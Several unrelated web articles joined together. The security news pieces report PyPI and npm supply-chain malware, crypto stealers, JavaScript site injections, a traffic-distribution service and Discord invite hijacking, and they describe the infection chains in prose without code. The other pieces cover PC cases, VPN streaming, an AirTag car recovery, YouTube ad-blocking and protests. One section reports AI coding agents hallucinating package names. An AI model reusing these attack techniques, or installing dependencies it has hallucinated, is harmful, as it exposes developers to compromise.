Jun 16, 2025Ravie LakshmananMalware / DevOps Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that's capable of harvesting sensitive developer-related information, such as credentials, configuration data, and environment variables, among others. The package, named chimera-sandbox-extensions, attracted 143 downloads and likely targets users of a service called Chimera Sandbox, which was released by Singaporean tech company Grab last August to facilitate "experimentation and development of [machine learning] solutions." The package masquerades as a helper module for Chimera Sandbox, but "aims to steal credentials and other sensitive information such as Jamf configuration, CI/CD environment variables, AWS tokens, and more," JFrog security researcher Guy Korolevski said in a report published last week. Once installed, it attempts to connect to an external domain whose domain name is generated using a domain generation algorithm (DGA) in order to download and execute a next-stage payload. Specifically, the malware acquires from the domain an authentication token, which is then used to send a request to the same domain and retrieve the Python-based information stealer. The stealer malware is equipped to siphon a wide range of data from infected machines. This includes - JAMF receipts, which are records of software packages installed by Jamf Pro on managed computers Pod sandbox environment authentication tokens and git information CI/CD information from environment variables Zscaler host configuration Amazon Web Services account information and tokens Public IP address General platform, user, and host information The kind of data gathered by the malware shows that it's mainly geared towards corporate and cloud infrastructure. In addition, the extraction of JAMF receipts indicates that it's also capable of targeting Apple macOS systems. The collected information is sent via a POST request back to the same domain, after which the server assesses if the machine is a worthy target for further exploitation. However, JFrog said it was unable to obtain the payload at the time of analysis. "The targeted approach employed by this malware, along with the complexity of its multi-stage targeted payload, distinguishes it from the more generic open-source malware threats we have encountered thus far, highlighting the advancements that malicious packages have made recently," Jonathan Sar Shalom, director of threat research at JFrog Security Research team, said. "This new sophistication of malware underscores why development teams remain vigilant with updates—alongside proactive security research – to defend against emerging threats and maintain software integrity." The disclosure comes as SafeDep and Veracode detailed a number of malware-laced npm packages that are designed to execute remote code and download additional payloads. The packages in question are listed below - eslint-config-airbnb-compat (676 Downloads) ts-runtime-compat-check (1,588 Downloads) solders (983 Downloads) @mediawave/lib (386 Downloads) All the identified npm packages have since been taken down from npm, but not before they were downloaded hundreds of times from the package registry. SafeDep's analysis of eslint-config-airbnb-compat found that the JavaScript library has ts-runtime-compat-check listed as a dependency, which, in turn, contacts an external server defined in the former package ("proxy.eslint-proxy[.]site") to retrieve and execute a Base64-encoded string. The exact nature of the payload is unknown. "It implements a multi-stage remote code execution attack using a transitive dependency to hide the malicious code," SafeDep researcher Kunal Singh said. Solders, on the other hand, has been found to incorporate a post-install script in its package.json, causing the malicious code to be automatically executed as soon as the package is installed. "At first glance, it's hard to believe that this is actually valid JavaScript," the Veracode Threat Research team said. "It looks like a seemingly random collection of Japanese symbols. It turns out that this particular obfuscation scheme uses the Unicode characters as variable names and a sophisticated chain of dynamic code generation to work." Decoding the script reveals an extra layer of obfuscation, unpacking which reveals its main function: Check if the compromised machine is Windows, and if so, run a PowerShell command to retrieve a next-stage payload from a remote server ("firewall[.]tel"). This second-stage PowerShell script, also obscured, is designed to fetch a Windows batch script from another domain ("cdn.audiowave[.]org") and configures a Windows Defender Antivirus exclusion list to avoid detection. The batch script then paves the way for the execution of a .NET DLL that reaches out to a PNG image hosted on ImgBB ("i.ibb[.]co"). "[The DLL] is grabbing the last two pixels from this image and then looping through some data contained elsewhere in it," Veracode said. "It ultimately builds up in memory YET ANOTHER .NET DLL." Furthermore, the DLL is equipped to create task scheduler entries and features the ability to bypass user account control (UAC) using a combination of FodHelper.exe and programmatic identifiers (ProgIDs) to evade defenses and avoid triggering any security alerts to the user. The newly-downloaded DLL is Pulsar RAT, a "free, open-source Remote Administration Tool for Windows" and a variant of the Quasar RAT. "From a wall of Japanese characters to a RAT hidden within the pixels of a PNG file, the attacker went to extraordinary lengths to conceal their payload, nesting it a dozen layers deep to evade detection," Veracode said. "While the attacker's ultimate objective for deploying the Pulsar RAT remains unclear, the sheer complexity of this delivery mechanism is a powerful indicator of malicious intent." Crypto Malware in the Open-Source Supply Chain The findings also coincide with a report from Socket that identified credential stealers, cryptocurrency drainers, cryptojackers, and clippers as the main types of threats targeting the cryptocurrency and blockchain development ecosystem. Some of the examples of these packages include - express-dompurify and pumptoolforvolumeandcomment, which are capable of harvesting browser credentials and cryptocurrency wallet keys bs58js, which drains a victim's wallet and uses multi-hop transfers to obscure theft and frustrate forensic tracing. lsjglsjdv, asyncaiosignal, and raydium-sdk-liquidity-init, which functions as a clipper to monitor the system clipboard for cryptocurrency wallet strings and replace them with threat actor‑controlled addresses to reroute transactions to the attackers "As Web3 development converges with mainstream software engineering, the attack surface for blockchain-focused projects is expanding in both scale and complexity," Socket security researcher Kirill Boychenko said. "Financially motivated threat actors and state-sponsored groups are rapidly evolving their tactics to exploit systemic weaknesses in the software supply chain. These campaigns are iterative, persistent, and increasingly tailored to high-value targets." AI and Slopsquatting The rise of artificial intelligence (AI)-assisted coding, also called vibe coding, has unleashed another novel threat in the form of slopsquatting, where large language models (LLMs) can hallucinate non-existent but plausible package names that bad actors can weaponize to conduct supply chain attacks. Trend Micro, in a report last week, said it observed an unnamed advanced agent "confidently" cooking up a phantom Python package named starlette-reverse-proxy, only for the build process to crash with the error "module not found." However, should an adversary upload a package with the same name on the repository, it can have serious security consequences. Furthermore, the cybersecurity company noted that advanced coding agents and workflows such as Claude Code CLI, OpenAI Codex CLI, and Cursor AI with Model Context Protocol (MCP)-backed validation can help reduce, but not completely eliminate, the risk of slopsquatting. "When agents hallucinate dependencies or install unverified packages, they create an opportunity for slopsquatting attacks, in which malicious actors pre-register those same hallucinated names on public registries," security researcher Sean Park said. "While reasoning-enhanced agents can reduce the rate of phantom suggestions by approximately half, they do not eliminate them entirely. Even the vibe-coding workflow augmented with live MCP validations achieves the lowest rates of slip-through, but still misses edge cases." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    

Cases News 6 Years to Make a Fan, G370A Budget Case, & Phanteks Technical Fan Discussion, ft. CTOJune 9, 2025Last Updated: 2025-06-09We cover Phanteks’ new G370A budget case, the XT M3, and the Evolv X2 MatrixThe HighlightsPhanteks’ new X2 Matrix case has 900 LEDs and is aiming to be around $200Phanteks’ G370A is a $60 case that includes 3x120mm fansThe company has a new T30-140 fan that required 6 years of engineering to makeTable of ContentsAutoTOC Grab a GN Tear-Down Toolkit to support our AD-FREE reviews and IN-DEPTH testing while also getting a high-quality, highly portable 10-piece toolkit that was custom designed for use with video cards for repasting and water block installation. Includes a portable roll bag, hook hangers for pegboards, a storage compartment, and instructional GPU disassembly cards.IntroWe visited Phanteks’ suite at Computex 2025 and the company showed off several cases along with a fan that took the company roughly 6 years to make.Editor's note: This was originally published on May 21, 2025 as a video. This content has been adapted to written format for this article and is unchanged from the original publication.CreditsHostSteve BurkeCamera, Video EditingMike GaglioneVitalii MakhnovetsWriting, Web EditingJimmy ThangPhanteks Matrix CasesWe’ve talked about Phanteks’ X2 case in the past but the company was showing off its new Matrix version, which has matrix LEDs. The X2 Matrix has 900 LEDs in a 10x90 layout. It’s supposed to be about $30 to $40 more expensive than the base X2, which means it should end up around $200.  The interesting thing about the case is that the LEDs wrap around the chassis. In terms of communication, the LEDs connect to the motherboard via USB 2.0 and use SATA for power. This allows Phanteks to bypass a WinRing 0 type situation. Another Matrix case had 600 of them in a 10x60 LED configuration and is supposed to be about $120. Phanteks also has software that allows you to reconfigure what the LEDs display. When we got to the company’s suite, it had been programmed to say, “Gamers Nexus here,” which was cool to see. We also saw that the LEDs can also be used to highlight CPU temperature. Phanteks G370A Grab a GN15 Large Anti-Static Modmat to celebrate our 15th Anniversary and for a high-quality PC building work surface. The Modmat features useful PC building diagrams and is anti-static conductive. Purchases directly fund our work! (or consider a direct donation or a Patreon contribution!)Phanteks also showed off its G370A case, which is a $60 case that includes 3x120mm fans in the front coupled with a mesh front that offers 38% hole porosity. The company tells us that manufacturing typically offers around 25% porosity.  It has a glass side panel and the back side panel of the case is just steel and has no ventilation. Taking a look at the placement of the front fans, we asked Phanteks why they weren’t higher on the case so the bottom fan could get more exposure to the bottom power supply shroud area and the answer the company gave us was simply clearance for a 360mm radiator at the top. There’s not a lot of room for the air coming into the shroud. Some of it will go through the cable pass-through if it’s empty. The back of the case features a drive mount.XTM3The company also showed off a Micro ATX case called the XTM3. It comes with 3 fans and is $70. For its front panel, it has a unique punch out for its fans. The top panel is part standard ventilation but it does have one side that provides less airflow, which covers where the PSU would exhaust out of. The side panel does have punch-outs for the PSU, however. We don’t test power supplies, though that may change in the future. Power supplies can take a lot of thermal abuse, however, so we’re not super concerned here.  The case should be shipping in the next month or so and is 39.5 liters, which includes the feet. We appreciate that as not a lot of companies will factor that in. There’s also a lot of cable management depth on the back and the case also supports BTF. In addition, there’s a panel that clamps down all of the power supply cables. T30 FanPhanteks’ T30 fan took the company 6 years to make and is a 140mm fan. The company is competing with Noctua in the high-end fan space, but is going for a grey theme instead of brown. Phanteks CTO Tenzin Rongen Interview Visit our Patreon page to contribute a few dollars toward this website's operation (or consider a direct donation or buying something from our GN Store!) Additionally, when you purchase through links to retailers on our site, we may earn a small affiliate commission.Finally, we interviewed Phanteks CTO Tenzin Rongen to discuss technical details behind the company’s long-developed fans. Make sure to check it out in our video.

Credit: Seth Herald/AFP via Getty Images TL;DR: Live stream USA vs. Trinidad and Tobago in the 2025 Concacaf Gold Cup for free on YouTube. Access this free live stream from anywhere in the world with ExpressVPN.The 2025 Concacaf Gold Cup is starting with a number of really interesting fixtures, including USA vs. Trinidad and Tobago. Things have been pretty rough for USA recently, but they'll be hoping to start afresh in this special tournament. The opening game against Trinidad and Tobago is going to be tricky, but USA will be confident of progressing through the group stage.If you want to watch USA vs. Trinidad and Tobago in the 2025 Concacaf Gold Cup for free from anywhere in the world, we have all the information you need. You May Also Like When is USA vs. Trinidad and Tobago?USA vs. Trinidad and Tobago in the 2025 Concacaf Gold Cup kicks off at 6 p.m. ET on June 15. This fixture takes place at PayPal Park.How to watch USA vs. Trinidad and Tobago for freeUSA vs. Trinidad and Tobago in the 2025 Concacaf Gold Cup is available to live stream for free on YouTube. Mashable Top Stories Stay connected with the hottest stories of the day and the latest entertainment news. Sign up for Mashable's Top Stories newsletter By clicking Sign Me Up, you confirm you are 16+ and agree to our Terms of Use and Privacy Policy. Thanks for signing up! These free live stream is not available in North or Central America, but fans in excluded territories can still watch this game for free with a VPN. These tools can hide your real IP address (digital location) and connect you to a secure server in another location, meaning you can unblock free live streams of the Concacaf Gold Cup from anywhere in the world.Live stream the 2025 Concacaf Gold Cup for free by following these simple steps:Subscribe to a streaming-friendly VPN (like ExpressVPN)Download the app to your device of choice (the best VPNs have apps for Windows, Mac, iOS, Android, Linux, and more)Open up the app and connect to a server in the UKVisit YouTubeLive stream the 2025 Concacaf Gold Cup for free from anywhere in the world Opens in a new window Credit: ExpressVPN ExpressVPN (1-Month Plan) $12.95 only at ExpressVPN (with money-back guarantee) The best VPNs for streaming are not free, but most do offer free-trials or money-back guarantees. By leveraging these offers, you can watch the 2025 Concacaf Gold Cup without actually spending anything. This clearly isn't a long-term solution, but it does give you enough time to stream USA vs. Trinidad and Tobago (plus the rest of the tournament) before recovering your investment.If you want to retain permanent access to the best free streaming services from around the world, you'll need a subscription. Fortunately, the best VPN for streaming live sport is on sale for a limited time.What is the best VPN for YouTube?ExpressVPN is the best service for bypassing geo-restrictions to stream live sport on YouTube, for a number of reasons:Servers in 105 countriesEasy-to-use app available on all major devices including iPhone, Android, Windows, Mac, and moreStrict no-logging policy so your data is always secureFast connection speedsUp to eight simultaneous connections30-day money-back guaranteeA two-year subscription to ExpressVPN is on sale for $139 and includes an extra four months for free — 61% off for a limited time. This plan also includes a year of free unlimited cloud backup and a generous 30-day money-back guarantee. Alternatively, you can get a one-month plan for just $12.95 (including money-back guarantee).Live stream the 2025 Concacaf Gold Cup for free with ExpressVPN. Joseph Green Global Shopping Editor Joseph Green is the Global Shopping Editor for Mashable. He covers VPNs, headphones, fitness gear, dating sites, streaming, and shopping events like Black Friday and Prime Day.Joseph is also Executive Editor of Mashable's sister site, AskMen.

Menu Home News Hardware Gaming Mobile Finance Deals Reviews How To Wccftech Mobile London Couple Tracks Down And Recovers £46,000 Jaguar Using Hidden AirTag After Police Fail To Act On Real-Time Location Of Stolen Vehicle Ali Salman • Jun 14, 2025 at 06:08pm EDT Apple's AirTag accessory is becoming more than just a way to find lost keys with its advanced tracking system. The accessory is unexpectedly becoming a hero when it comes to recovering stolen vehicles. In a new real-world case that highlights the AirTag's precision tracking, a London-based couple successfully located and recovered their £46,000 Jaguar E-Pace, while the police failed to take immediate action despite having real-time location data. A couple used an AirTag to track their stolen Jaguar and recovered it themselves after police delayed their response. The incident took place on June 3 in Brook Green, Hammersmith, where the couple's Jaguar was stolen from their home (via MacMagazine). Little did the thieves know, the vehicle was stashed with an AirTag, which led the couple to the location of their car in a nearby neighborhood, Chiswick. The AirTag did its job quite well and provided the couple with the location of their stolen vehicle, which was then forwarded to the Metropolitan Police. Even after the police had the location of the stolen Jaguar, the response was not what the couple was expecting. The owner of the vehicle told BBC News: “I wanted to act quite quickly as my fear was that we would find the AirTag and not the car when it was discarded on to the street without the car, so I told them that we were planning to head to the location.” Instead of taking action and sending backup right there and then, the police merely acknowledged the risky plan and advised the couple to call again if needed. The couple decided to go to the location by themselves, which was a risky move. They found the car parked on a residential street, and after bypassing the remote security systems, the couple was able to remotely unlock the car and recover it successfully. In a statement shared by the Metropolitan Police, “This investigation is ongoing, and officers met the victim on Tuesday, 10 June, as part of their inquiries.” While the story ends with a win for the victims and for the AirTags, it does raise questions about police responsiveness in technology-assisted theft cases. Apple has never marketed the AirTags as an anti-theft device and instead, it warns users not to recover stolen property due to potential safety risks. All in all, we are glad that the stolen car was recovered and the couple was safe by the end of the day. Moreover, stories like these also highlight the growing role of smart tracking accessories used in the personal security space, alongside the growing need for authorities to take measures accordingly. Subscribe to get an everyday digest of the latest technology news in your inbox Follow us on Topics Sections Company Some posts on wccftech.com may contain affiliate links. We are a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to amazon.com © 2025 WCCF TECH INC. 700 - 401 West Georgia Street, Vancouver, BC, Canada

It’s fairly easy to block the constant, incessant advertising that appears on YouTube. Google would prefer that you don’t, or pay up (quite a lot) to make them go away. Last weekend, the company started its latest campaign to try and badger ad-block users into disabling their extensions. Since then, it looks like YouTube has escalated things and is now intentionally slowing down videos. Posters on Reddit and the Brave browser forum have observed videos being blacked out on first load, approximately for the length of pre-roll ads, with a pop-up link that directs users to the ad-blocking section of this technical support page. “Check whether your browser extensions that block ads are affecting video playback,” suggests Google. “As another option, try opening YouTube in an incognito window with all extensions disabled and check if the issue continues.” PCWorld staff has seen this in action, using uBlock Origin Lite. Google Ad-block extension developers quickly got around the pop-up issue earlier this week, with one AdGuard representative calling the process “a classic cat-and-mouse game.” But if Google wanted to instigate a more serious crackdown on users blocking ads without paying up, it could do so easily—and we’ve seen it pull this same move before. Posters on the latest issue speculate that the slowdowns might be tagged to specific Google or YouTube user accounts that were detected blocking ads previously, which would bypass any kind of interaction with a specific browser or extension. I can’t independently confirm that’s happening, but it wouldn’t surprise me. It also wouldn’t shock me if Google is seeing a larger percentage of YouTube users blocking advertising, as is the case all across the web, as the quantity of advertising rises while quality takes a nosedive. YouTube video creators are having to get, well, creative to seek alternate revenue beyond basic AdSense accounts, as sponsored videos are now constant across the platform and more channels put new videos behind paywalls on YouTube itself or via other platforms like Patreon. YouTube is attacking the issue from other angles as well. Tech-focused creators that show how to use third-party tools to block ads or download videos from the site (again, without paying the steep fees for YouTube Premium) are getting their videos taken down and their accounts flagged, for violation of the extremely vague policy around “harmful and dangerous content.” If I may editorialize a bit: Google, if you want more people to subscribe to YouTube Premium and remove advertising, you need to make it cheaper. Charging $14 per month just to get rid of ads is the same cost of a premium subscription from other sources where users can watch full movies and series. YouTube as a platform is a much lower bar and just doesn’t compete at that level. I’m not going to pay that much to get rid of ads, not when it doesn’t actually get rid of all the ads—those sponsored and subscriber-only videos are still all over the place—and the site is filling up with AI slop. “Premium Lite,” which neuters the offerings for mobile and music-focused users, doesn’t make the cut either. And to be clear, I have no problem paying for the stuff I watch. I already pay more than $15 a month to support the individual YouTube channels I enjoy, like Second Wind, Drawfee, and several tech podcasts. But I do it via Patreon because sending that money through YouTube feels gross. If Google wants people to pay up, it needs to lower the price enough so that it’s no longer worth the hassle of blocking them. It’s a lesson that the music, movie, and game industries learned a long time ago as they fought the initial wave of internet piracy… and now seem to be forgetting again.

Jun 13, 2025Ravie LakshmananWeb Security / Network Security Cybersecurity researchers are calling attention to a "large-scale campaign" that has been observed compromising legitimate websites with malicious JavaScript injections. According to Palo Alto Networks Unit 42, these malicious injects are obfuscated using JSFuck, which refers to an "esoteric and educational programming style" that uses only a limited set of characters to write and execute code. The cybersecurity company has given the technique an alternate name JSFireTruck owing to the profanity involved. "Multiple websites have been identified with injected malicious JavaScript that uses JSFireTruck obfuscation, which is composed primarily of the symbols [, ], +, $, {, and }," security researchers Hardik Shah, Brad Duncan, and Pranay Kumar Chhaparwal said. "The code's obfuscation hides its true purpose, hindering analysis." Further analysis has determined that the injected code is designed to check the website referrer ("document.referrer"), which identifies the address of the web page from which a request originated. Should the referrer be a search engine such as Google, Bing, DuckDuckGo, Yahoo!, or AOL, the JavaScript code redirects victims to malicious URLs that can deliver malware, exploits, traffic monetization, and malvertising. Unit 42 said its telemetry uncovered 269,552 web pages that have been infected with JavaScript code using the JSFireTruck technique between March 26 and April 25, 2025. A spike in the campaign was first recorded on April 12, when over 50,000 infected web pages were observed in a single day. "The campaign's scale and stealth pose a significant threat," the researchers said. "The widespread nature of these infections suggests a coordinated effort to compromise legitimate websites as attack vectors for further malicious activities." Say Hello to HelloTDS The development comes as Gen Digital took the wraps off a sophisticated Traffic Distribution Service (TDS) called HelloTDS that's designed to conditionally redirect site visitors to fake CAPTCHA pages, tech support scams, fake browser updates, unwanted browser extensions, and cryptocurrency scams through remotely-hosted JavaScript code injected into the sites. The primary objective of the TDS is to act as a gateway, determining the exact nature of content to be delivered to the victims after fingerprinting their devices. If the user is not deemed a suitable target, the victim is redirected to a benign web page. "The campaign entry points are infected or otherwise attacker-controlled streaming websites, file sharing services, as well as malvertising campaigns," researchers Vojtěch Krejsa and Milan Špinka said in a report published this month. "Victims are evaluated based on geolocation, IP address, and browser fingerprinting; for example, connections through VPNs or headless browsers are detected and rejected." Some of these attack chains have been found to serve bogus CAPTCHA pages that leverage the ClickFix strategy to trick users into running malicious code and infecting their machines with a malware known as PEAKLIGHT (aka Emmenhtal Loader), which is known to server information stealers like Lumma. Central to the HelloTDS infrastructure is the use of .top, .shop, and .com top-level domains that are used to host the JavaScript code and trigger the redirections following a multi-stage fingerprinting process engineered to collect network and browser information. "The HelloTDS infrastructure behind fake CAPTCHA campaigns demonstrates how attackers continue to refine their methods to bypass traditional protections, evade detection, and selectively target victims," the researchers said. "By leveraging sophisticated fingerprinting, dynamic domain infrastructure, and deception tactics (such as mimicking legitimate websites and serving benign content to researchers) these campaigns achieve both stealth and scale." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    

Jun 14, 2025Ravie LakshmananMalware / Threat Intelligence A new malware campaign is exploiting a weakness in Discord's invitation system to deliver an information stealer called Skuld and the AsyncRAT remote access trojan. "Attackers hijacked the links through vanity link registration, allowing them to silently redirect users from trusted sources to malicious servers," Check Point said in a technical report. "The attackers combined the ClickFix phishing technique, multi-stage loaders, and time-based evasions to stealthily deliver AsyncRAT, and a customized Skuld Stealer targeting crypto wallets." The issue with Discord's invite mechanism is that it allows attackers to hijack expired or deleted invite links and secretly redirect unsuspecting users to malicious servers under their control. This also means that a Discord invite link that was once trusted and shared on forums or social media platforms could unwittingly lead users to malicious sites. Details of the campaign come a little over a month after the cybersecurity company revealed another sophisticated phishing campaign that hijacked expired vanity invite links to entice users into joining a Discord server and instruct them to visit a phishing site to verify ownership, only to have their digital assets drained upon connecting their wallets. While users can create temporary, permanent, or custom (vanity) invite links on Discord, the platform prevents other legitimate servers from reclaiming a previously expired or deleted invite. However, Check Point found that creating custom invite links allows the reuse of expired invite codes and even deleted permanent invite codes in some cases. This ability to reuse Discord expired or deleted codes when creating custom vanity invite links opens the door to abuse, allowing attackers to claim it for their malicious server. "This creates a serious risk: Users who follow previously trusted invite links (e.g., on websites, blogs, or forums) can unknowingly be redirected to fake Discord servers created by threat actors," Check Point said. The Discord invite-link hijacking, in a nutshell, involves taking control of invite links originally shared by legitimate communities and then using them to redirect users to the malicious server. Users who fall prey to the scheme and join the server are asked to complete a verification step in order to gain full server access by authorizing a bot, which then leads them to a fake website with a prominent "Verify" button. This is where the attackers take the attack to the next level by incorporating the infamous ClickFix social engineering tactic to trick users into infecting their systems under the pretext of verification. Specifically, clicking the "Verify" button surreptitiously executes JavaScript that copies a PowerShell command to the machine's clipboard, after which the users are urged to launch the Windows Run dialog, paste the already copied "verification string" (i.e., the PowerShell command), and press Enter to authenticate their accounts. But in reality, performing these steps triggers the download of a PowerShell script hosted on Pastebin that subsequently retrieves and executes a first-stage downloader, which is ultimately used to drop AsyncRAT and Skuld Stealer from a remote server and execute them. At the heart of this attack lies a meticulously engineered, multi-stage infection process designed for both precision and stealth, while also taking steps to subvert security protections through sandbox security checks. AsyncRAT, which offers comprehensive remote control capabilities over infected systems, has been found to employ a technique called dead drop resolver to access the actual command-and-control (C2) server by reading a Pastebin file. The other payload is a Golang information stealer that's downloaded from Bitbucket. It's equipped to steal sensitive user data from Discord, various browsers, crypto wallets, and gaming platforms. Skuld is also capable of harvesting crypto wallet seed phrases and passwords from the Exodus and Atomic crypto wallets. It accomplishes this using an approach called wallet injection that replaces legitimate application files with trojanized versions downloaded from GitHub. It's worth noting that a similar technique was recently put to use by a rogue npm package named pdf-to-office. The attack also employs a custom version of an open-source tool known as ChromeKatz to bypass Chrome's app-bound encryption protections. The collected data is exfiltrated to the miscreants via a Discord webhook. The fact that payload delivery and data exfiltration occur via trusted cloud services such as GitHub, Bitbucket, Pastebin, and Discord allows the threat actors to blend in with normal traffic and fly under the radar. Discord has since disabled the malicious bot, effectively breaking the attack chain. Check Point said it also identified another campaign mounted by the same threat actor that distributes the loader as a modified version of a hacktool for unlocking pirated games. The malicious program, also hosted on Bitbucket, has been downloaded 350 times. It has been assessed that the victims of these campaigns are primarily located in the United States, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the United Kingdom. The findings represent the latest example of how cybercriminals are targeting the popular social platform, which has had its content delivery network (CDN) abused to host malware in the past. "This campaign illustrates how a subtle feature of Discord's invite system, the ability to reuse expired or deleted invite codes in vanity invite links, can be exploited as a powerful attack vector," the researchers said. "By hijacking legitimate invite links, threat actors silently redirect unsuspecting users to malicious Discord servers." "The choice of payloads, including a powerful stealer specifically targeting cryptocurrency wallets, suggests that the attackers are primarily focused on crypto users and motivated by financial gain." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    

Two different groups of Americans are expected to march through the streets today. As thousands of troops march and dozens of tanks roll through Washington, D.C., for a military parade celebrating the Army’s 250th anniversary on President Donald Trump’s 79th birthday, millions of Americans nationwide are expected to protest against his administration, in what organizers believe will be the largest turnout yet since Trump took office in January for a second term. Here’s what to know about the “No Kings Day” protests: Why are people protesting? The No Kings Day protest movement builds on this spring’s massive May Day and Hands Off! rallies. They come after days of nationwide demonstrations against controversial federal immigration raids and deportations in Los Angeles and a number of other U.S. cities, which are part of the Trump administration’s ramped-up enforcement efforts. How big will the rallies be and where will they take place? Organizers expect 2,000 rallies to take place on Saturday in all 50 states and most major cities, “from city blocks to small towns, from courthouse steps to community parks.” Protesters say they are “taking action to reject authoritarianism—and show the world what democracy really looks like.” To avoid clashes with the Army’s anniversary celebrations, protest gatherings will bypass the nation’s capital. (Trump has threatened to use “heavy force” against any protesters at the parade, comments the White House later attempted to clarify by asserting that the president supports “peaceful” protests.) The No Kings groups have created an extensive interactive map that includes the protest locations and times. The map is embedded on the No Kings website and is searchable by zip code. Who is behind the protest movement? Indivisible is the lead organizer of Saturday’s No Kings protests, along with a broad coalition of 180-plus partner organizations, including the American Civil Liberties Union, Common Cause, Greenpeace, Physicians for Social Responsibility, and Standing Up for Science. A number of labor unions, including the Communication Workers of America and teacher federations, are also involved in the effort. Who will be speaking? The group 50501, another organizer of the protests, told Fast Company that some of the major speakers planned nationwide include former Democratic VP candidate Minnesota Governor Tim Walz, in St. Paul; Martin Luther King Jr.’s son, Martin Luther King III, and his wife, Arndrea Waters King, in Philadelphia; No Kings Indivisible’s Leah Greenberg and Ezra Levin, also in Philadelphia; Democratic Representative Rashida Tlaib in Detroit; former Republican Representative Joe Walsh (who became a registered Democrat last week) in Charleston; and progressive political commentator Brian Tyler Cohen in downtown Los Angeles. What else is there to know? In addition to rallies around the U.S., protests are also expected in several other countries, including the U.K., Mexico, and Germany.